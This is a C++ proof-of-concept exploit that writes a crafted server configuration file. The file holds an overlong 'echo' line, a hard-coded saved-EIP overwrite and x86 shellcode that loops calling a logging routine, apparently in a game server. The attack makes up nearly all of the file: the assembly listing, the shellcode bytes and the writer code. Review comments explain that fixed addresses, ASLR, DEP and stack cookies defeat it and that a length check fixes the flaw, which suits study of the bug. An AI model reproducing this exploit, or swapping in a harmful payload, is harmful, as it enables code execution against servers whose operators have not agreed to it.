- #include <iostream>
// http://sasuke78200.blogspot.fr/
/*
Assembly source of the shellcode (32-bit x86)
USE32
_start:
call _getStrAddr
_logprintf:
pop ebx ; pop the last EIP (which is now the address of the string "Hi this is a buffer overflow !") on ebx
sub esp, 0x80 ; adjust esp
push 0x00000000 ; push 0
push ebx ; push offset "Hi this is a buffer overflow !"
mov eax, 0x427B60 ; eax = logprintf
call eax ; call logprintf
add esp, 0x80 ; readjust esp
jmp _start ; restart
_getStrAddr:
call _logprintf
db "Hi this is a buffer overflow !"
db 0
*/
/*
 * Builds a proof-of-concept "./server.cfg" whose single "echo" line is, per
 * the original author's notes, longer than the buffer the target reads it
 * into. The vulnerable parser itself is not part of this file.
 *
 * File layout, in write order:
 *   1. "echo " + 251 spaces  -> 256 bytes of filler
 *   2. 20 FD 12 00           -> 4 bytes the author labels as the saved-EIP
 *                               overwrite (0x0012FD20 read little-endian)
 *   3. payload[]             -> the 66 bytes assembled from the listing in
 *                               the comment above main()
 *
 * Defensive reading: the 4-byte value and the call target inside the payload
 * (0x00427B60) are hard-coded absolute addresses, so the file can only have
 * the described effect on one specific build with a fixed memory layout.
 * NOTE(review): 0x0012FD20 looks like a stack address, which would also
 * require an executable stack -- confirm against the target.
 * ASLR, DEP/NX and stack cookies each break those assumptions; the root fix
 * is a length check where the config line is copied. A config line far
 * longer than any legitimate directive, or one containing non-printable
 * bytes, is straightforward to reject or alert on.
 *
 * Returns 0 whether or not the file could be opened; write errors are not
 * checked.
 */
int main()
{
    /* Machine code for the assembly listing above; the last 31 bytes are the
       NUL-terminated message string. */
    char payload[] =
    {
        0xE8, 0x19, 0x00, 0x00, 0x00, 0x5B, 0x81, 0xEC, 0x80, 0x00, 0x00, 0x00,
        0x6A, 0x00, 0x53, 0xB8, 0x60, 0x7B, 0x42, 0x00, 0xFF, 0xD0, 0x81, 0xC4,
        0x80, 0x00, 0x00, 0x00, 0xEB, 0xE2, 0xE8, 0xE2, 0xFF, 0xFF, 0xFF, 0x48,
        0x69, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x61, 0x20,
        0x62, 0x75, 0x66, 0x66, 0x65, 0x72, 0x20, 0x6F, 0x76, 0x65, 0x72, 0x66,
        0x6C, 0x6F, 0x77, 0x20, 0x21, 0x00
    };
    int remaining;
    FILE* cfg = fopen("./server.cfg", "wb");

    /* Nothing to do if the output file cannot be created. */
    if(!cfg)
    {
        return 0;
    }

    /* Directive keyword followed by filler that exceeds the buffer size. */
    fputs("echo ", cfg);
    for(remaining = 251; remaining > 0; --remaining)
    {
        fputc(' ', cfg);
    }

    /* Four bytes the author marks as overwriting the saved EIP. */
    fwrite("\x20\xFD\x12\x00", 4, 1, cfg);

    /* The payload bytes follow immediately after. */
    fwrite(payload, 1, sizeof(payload), cfg);

    fclose(cfg);
    return 0;
}